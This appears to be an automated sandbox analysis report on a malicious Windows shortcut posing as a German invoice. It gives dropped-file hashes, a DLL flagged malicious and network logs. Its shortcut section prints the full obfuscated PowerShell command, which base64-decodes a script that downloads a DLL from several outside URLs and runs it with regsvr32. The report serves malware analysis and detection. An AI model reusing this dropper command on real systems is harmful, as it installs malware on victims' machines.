                                                                          Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtms2noi.pps.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvcdsjdc.j3a.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1

                                                                          C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):365056
                                                                          Entropy (8bit):7.158107270371674
                                                                          Encrypted:false
                                                                          SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                          MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                          SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                          SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                          SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 31%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 40%
                                                                          Joe Sandbox View:
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\Documents\20220523\PowerShell_transcript.580913.ffZmUZc7.20220523085407.txt

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2558
                                                                            Entropy (8bit):5.979633073915895
                                                                            Encrypted:false
                                                                            SSDEEP:48:BZuv/ooO+VipJ7o/awfYnB33ZoqDYB1ZkzVipJ7o/awfYnB33XoZZZC:BZC/oN+kpOtYnBHOqDo1ZEkpOtYnBHYM
                                                                            MD5:70BE1F4382251E34AE9AEE7F24557F6C
                                                                            SHA1:EAE883975F7B11C5E93216E2585B3F288F34E3AA
                                                                            SHA-256:2EF71BD4C4054FF7026969F2D3B4E21893A9CB4CE72653B22DBD66C42A1C3D68
                                                                            SHA-512:4BDE6D3AEC134832FEB7D56E0A4F252F1C57772AC896252882B634665B9A915EFB9FB5561579E01E7B5E3554A99AF25E02362E7C3FAF53520B19B3190B1EC0ED
                                                                            Malicious:false
                                                                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220523085409..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 580913 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -c &{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt

                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                            Download File
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                            C:\Windows\System32\ZrCipB\RLcE.dll (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):365056
                                                                            Entropy (8bit):7.158107270371674
                                                                            Encrypted:false
                                                                            SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                            MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                            SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                            SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                            SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                            Malicious:false
                                                                            Joe Sandbox View:
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792, window=hidenormalshowminimized
                                                                              Entropy (8bit):3.753682067002701
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:RechnungsDetails 2022.20.05_1044.lnk
                                                                              File size:3599
                                                                              MD5:235332fd9cf506fd4508ac0fb8d1b64a
                                                                              SHA1:514f37f2b32eb85d18588f44670830e355c69749
                                                                              SHA256:6a6547bc259080ecf6b26354da81caaa639216191f5a59d9cc088a2e9597e9c9
                                                                              SHA512:e048348c033e9d18678a44242e78edefb5efe24f279aa9e979466cda3142be4194edcdffd45d8a0dedbe82d0a916805e83e8f386cade90726185122d3aee6c15
                                                                              SSDEEP:48:8iMuTKt9pLXjFoByV2jGxHiBdb7mbtfcIsmkJgZfRAMI2aby:8iMuWt9pLpSycKxCBdb7bm4MR
                                                                              TLSH:3771CF393DD95118E1F3DF757CE9BA96CFA9B623B512495E008103064D51600EE96D3F
                                                                              File Content Preview:L..................F.... .....<.....S....k....<......l......................5....P.O. .:i.....+00.../C:\...................V.1......T....Windows.@........OwH.T!.....!.........................W.i.n.d.o.w.s.....Z.1......T.2..System32..B........OwH.T!.......

                                                                              File Icon

                                                                              Icon Hash:fc3cf4c4dcd9d9ed

                                                                              Static Windows Shortcut Info

                                                                              General

                                                                              Relative Path:
                                                                              Command Line Argument:/v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                                                                              Icon location:shell32.dll

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 23, 2022 08:54:12.762672901 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:12.890944958 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:12.891443014 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:12.907315016 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.035698891 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094686031 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094719887 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094737053 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094753027 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094765902 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094778061 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094780922 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.094790936 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094804049 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094820023 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094831944 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.094856977 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.094913006 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223062992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223097086 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223113060 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223129034 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223225117 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223264933 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223268986 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223289013 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223303080 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223315001 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223326921 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223340034 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223351955 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223392963 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223407984 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223418951 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223433018 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223448992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223467112 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223479033 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223484993 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223516941 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223522902 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223536015 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.223547935 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.223586082 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.351563931 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351594925 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351612091 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351629019 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351646900 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.351694107 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.351914883 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351944923 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351979017 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.351989031 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352010965 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352027893 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352045059 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352057934 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352061987 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352080107 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352091074 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352097034 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352117062 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352134943 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352139950 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352152109 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352169991 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352174997 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352186918 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352196932 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352204084 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352220058 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352236986 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352241993 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352260113 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352277040 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352283001 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352293968 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352308989 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352310896 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352329016 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352344990 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352363110 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352364063 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352381945 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352390051 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352400064 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352416992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352421999 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352433920 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352452993 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352461100 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352472067 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352495909 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352502108 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352519035 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352529049 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352535963 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352554083 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352559090 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352571011 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352587938 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.352611065 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.352652073 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.479825020 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479868889 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479892969 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479914904 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479938984 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479967117 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.479975939 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480020046 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480031013 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480096102 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480150938 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480609894 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480647087 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480671883 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480695009 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.480704069 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.480731964 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.482904911 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.482954025 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.482980967 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483007908 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483033895 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483059883 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483087063 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483104944 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483114004 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483139992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483165979 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483179092 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483190060 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483196020 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483222961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483247995 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483259916 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483275890 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483304024 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483316898 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483328104 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483336926 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483355045 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483380079 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483386993 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483406067 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483433008 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483441114 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483458996 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483484983 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483489990 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483510971 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483537912 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483544111 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483563900 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483589888 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483592033 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483613968 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483642101 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483644962 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483665943 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483688116 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483707905 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483726978 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483747005 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483758926 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483776093 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483781099 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483802080 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483825922 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.483834982 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.483895063 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.608314991 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608359098 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608428001 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608454943 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.608464003 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.608515024 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609004974 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609035969 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609060049 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609083891 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609086037 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609106064 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609128952 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609137058 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609153032 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609174967 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.609180927 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.609230995 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.611896992 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611932039 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611954927 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611979961 CEST804975498.142.105.106192.168.2.5
                                                                              May 23, 2022 08:54:13.611990929 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.612023115 CEST4975480192.168.2.598.142.105.106
                                                                              May 23, 2022 08:54:13.613959074 CEST804975498.142.105.106192.168.2.5
